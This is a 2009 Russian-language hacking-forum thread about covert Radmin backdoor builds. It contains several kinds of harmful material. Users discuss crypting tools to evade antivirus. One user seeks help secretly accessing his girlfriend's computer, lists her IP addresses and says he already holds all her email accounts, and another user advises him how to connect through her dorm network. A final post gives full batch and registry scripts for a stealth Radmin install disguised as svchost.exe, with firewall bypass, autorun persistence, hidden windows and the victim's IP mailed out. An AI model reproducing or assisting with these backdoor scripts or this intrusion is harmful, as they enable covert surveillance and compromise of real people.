ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > АнтиАдмин
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 08.01.2009, 16:37
Аватар для Vans™
Vans™
Новичок
Регистрация: 02.01.2009
Сообщений: 17
Провел на форуме:
165903

Репутация: 1
По умолчанию

smile 1.0 pack .... AVP сразу выносит... нужно бы криптануть... =\
 
Ответить с цитированием

Доказательство =)
  #232  
Старый 08.01.2009, 18:27
Аватар для ex3me
ex3me
Участник форума
Регистрация: 07.01.2009
Сообщений: 186
Провел на форуме:
1247273

Репутация: 166
Отправить сообщение для ex3me с помощью ICQ
Arrow Доказательство =)

Можете оценить скрин

Тут 2 сборки, клиент. Дата заливки соответственно совпадает с той, которую я писал выше.
Думаю этого вполне достаточно для доказательства
 
Ответить с цитированием

  #233  
Старый 08.01.2009, 18:31
Аватар для ex3me
ex3me
Участник форума
Регистрация: 07.01.2009
Сообщений: 186
Провел на форуме:
1247273

Репутация: 166
Отправить сообщение для ex3me с помощью ICQ
По умолчанию

2 Vans : KIS 7.0 с базами от 08.01.09 - ничего не видит.
 
Ответить с цитированием

  #234  
Старый 08.01.2009, 23:31
Аватар для ex3me
ex3me
Участник форума
Регистрация: 07.01.2009
Сообщений: 186
Провел на форуме:
1247273

Репутация: 166
Отправить сообщение для ex3me с помощью ICQ
Exclamation

Цитата:
Сообщение от noh4o  
ADSL стоит у меня(не в этом же дело?), а у нее нет, у нее сетка. прямее некуда
едиственное, они в общаге универской живут с соседкой и у них инет разветвляет один коммутатор, просто делит инет им, но у каждой, если я не ошибаюсь, должен быть свой IP, но знаю точно, у моей он не меняется...
файера нет вообще...
что можно сделать?

попробуйте сами кто-нить, может получится
у нее ай-пи, первый должен быть, просто она перезжала из одной комнаты в другую, вроде был последний, недавно проверял, но на всяк случ выложил
212.45.8.212
212.45.8.213

у нее стоит радмин, должен же у кого-то законнектиться...
Скорее всего ты пытаешься законнектиться к ее внутреннему ИП (локалной сети). Если же это не так, то ситуация следующая: в универе стоит сервер (как раз тот ИП что ты указал - это скорее всего его ИП), который раздает инет. На сервере 2 сетевые карты. Одна с локальным ИП, другая с глобальным (т.е. инет) ИП. В инет девушка выходит через сервер!!! Соответственно ты пытаешься законнектится к ИП сервера, а не девушки (ну а на серваке наверное радмин не стоит)

Более подробной картины из имеющихся данных нарисовать не могу.

Выход: узнать ее локальный ИП, и изнутри сети подключиться к нему.

З.Ы. Кому понравился ответ +1 в репу мне =))
 
Ответить с цитированием

  #235  
Старый 09.01.2009, 06:27
Аватар для noh4o
noh4o
Новичок
Регистрация: 12.11.2008
Сообщений: 7
Провел на форуме:
42897

Репутация: 1
По умолчанию

1. Смотри:

Внешний IP: 212.45.8.212
Внутренний IP: 127.0.0.1
Порт: 22195

вот что выдал мне QIP, када она мне пересылала файл со своего компа...
может это больше прояснит возожные варианты решения моего вопроса?

2. и еще вопрос...
что значит изнутри сети подключиться к нему... т.е.е через другого клиента их общажного инета?

+-ы уже поставил, тебе итак большой респект от всех, я думаю))
 
Ответить с цитированием

  #236  
Старый 09.01.2009, 13:52
Аватар для nez0rF
nez0rF
Познающий
Регистрация: 08.08.2008
Сообщений: 52
Провел на форуме:
402497

Репутация: 3
Отправить сообщение для nez0rF с помощью ICQ
По умолчанию

ип на сколько я понял не внутренний. на счет ип-сервара, - было сказанно что после того как она переехала в др. комнату ип сменился, сомневаюсь я что у них под каждую комнату свой прокси\nat . Скорее всего что-то блокирует радминчег, либо действительно сидят они все через прокси, тогда уже ничего не сделаешь. nat рулит
ps: мб туплю, прочел последние 2 страницы темы.
 
Ответить с цитированием

  #237  
Старый 09.01.2009, 16:12
Аватар для ex3me
ex3me
Участник форума
Регистрация: 07.01.2009
Сообщений: 186
Провел на форуме:
1247273

Репутация: 166
Отправить сообщение для ex3me с помощью ICQ
Exclamation

Цитата:
Сообщение от noh4o  
1. Смотри:

Внешний IP: 212.45.8.212
Внутренний IP: 127.0.0.1
Порт: 22195

вот что выдал мне QIP, када она мне пересылала файл со своего компа...
может это больше прояснит возожные варианты решения моего вопроса?

2. и еще вопрос...
что значит изнутри сети подключиться к нему... т.е.е через другого клиента их общажного инета?

+-ы уже поставил, тебе итак большой респект от всех, я думаю))
Ну вот как раз Внешний IP: 212.45.8.212 - это ИП прокси-сервера (который им раздает инет)
127.0.0.1 - локальный ип любого компа, независимо подключен он к сети или нет (исп. к примеру для тестирования скриптов на локальном веб-сервере)

Изнутри сети - значит идешь в общагу к ней, узнаешь ее локальный адрес, заходишь в другую комнату (в которой есть сеть), коннектишь ноут и под ключаешься через локальную сеть к ней. Если ноута нету - используй первый попавшийся комп из ее локалки.

nez0rF правильно говорит - то, что выдает тебе квип - это не ее ИП, а ИП сервера. Квип выдаст тебе этот же ИП если ты будешь пересылать кому-то файл из ее же сети (при условии, конечно, что тот кому ты будешь пересылать использует тот же сервер что и она).

Итог: извне ты не сможешь подключиться, надо только топать к ее соседям, у которых тоже есть локалка и пробовать коннектится оттуда
 
Ответить с цитированием

  #238  
Старый 09.01.2009, 17:28
Аватар для noh4o
noh4o
Новичок
Регистрация: 12.11.2008
Сообщений: 7
Провел на форуме:
42897

Репутация: 1
По умолчанию

млин, короче я все понял)) спасибо всем!!
IP точно этот, т.к. с него приходит почта по мылу, все ее мыла уже в моем распоряжении

ок, притащу туда ноут и буду пробовать
 
Ответить с цитированием

  #239  
Старый 26.01.2009, 14:56
Аватар для elmo
elmo
Новичок
Регистрация: 26.01.2009
Сообщений: 2
Провел на форуме:
11218

Репутация: 0
По умолчанию

всем привет .
я ламер и поэтому прошу у вас помощи .
скачал серва с http://www.filehoster.ru/files/bx3443 . но он палится антивирем и в процессах есть .
если не трудно дайте собранный сервер радмина версии 3.0 (т.к. он вроде как антивирусами не обнаруживатся или что!?)
1. чтоб небыло иконки
2. чтоб скинывал IP на мыло (я так понял это pinch делает )
3. непалился антивирем
4. небыло в процессах .
и подскажите куда в файле install вводить пароль .
т.е. как я понял это тоже самое что я скачал ток 3 версия + батник с други кодом .
заранее псб за содействие .
 
Ответить с цитированием

  #240  
Старый 28.01.2009, 23:53
Аватар для PenSpinner
PenSpinner
Познающий
Регистрация: 10.12.2008
Сообщений: 35
Провел на форуме:
200093

Репутация: 17
Отправить сообщение для PenSpinner с помощью ICQ
По умолчанию

едит. не знаю почему, слеши не отображаются (кое-где). на самом деле они там есть.

привет, онтечад.
сделал свою сборку радмина. тестил на себе, пашет (дада, можно подключаться к себе хД) на других нет (пока тестил на двух). может всё же что-то у меня со сборкой? содержимое sfx архива: 111.bat
111.reg
run.bat

admdll.dll
raddrv.dll
svchost.exe
_
blat.exe |
blat.dll ---- файлы консольного мейл клиента
blat.lib _|

hidcon.exe - прекрасная вещичка, которая ПОЛНОСТЬЮ скрывает выполнение батника (синтаксис очень простой: hidcon.exe [имя_батника].bat)

содержимое файла 111.bat:

PHP код:
blat.exe -install -server smtp.yandex.ru -port 587 -f моё_мыло@yandex.ru -u мой_логин -pw мой_пароль
reg delete  
"HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /
reg import 111.reg regedit 
/s 111.reg "%SYSTEMROOT%/svchost.exe" /install /silence 
hidcon
.exe run.bat 
содержимое run.bat:

PHP код:
ipconfig >> C:\WINDOWS\system32\ip.txt
netsh firewall add allowedprogram 
"%SYSTEMROOT%\svchost.exe" "SVCHOST" ENABLE
"%SYSTEMROOT%\svchost.exe" /start
blat
.exe  C:\\WINDOWS\system32\ip.txt -to моё_мыло2@yandex.ru
erase C
:\\WINDOWS\\system32\\ip.txt
exit 
содержимое 111.reg

PHP код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin]

[
HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0]

[
HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server]

[
HKEY_LOCAL_MACHINE\\SYSTEM\RAdmin\v2.0\\Server\\iplist]

[
HKEY_LOCAL_MACHINE\\SYSTEM\RAdmin\\v2.0\\Server\\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce,1a
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"
=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\RAdmin\\v1.01\\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4,b9,49,c8,49,00,1c,eb,\
  
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74,94,4f,49,42,46,f7,ab,05,\
  
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows \CurrentVersion\\Run]
"svchost"="C:\\WINDOWS\\hidcon.exe run.bat" 
меня уже достал этот секас...что не так??? у меня всё пашет вроде, айпи норм присылается от других, а вот коннекта нет...

Последний раз редактировалось PenSpinner; 29.01.2009 в 00:02..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ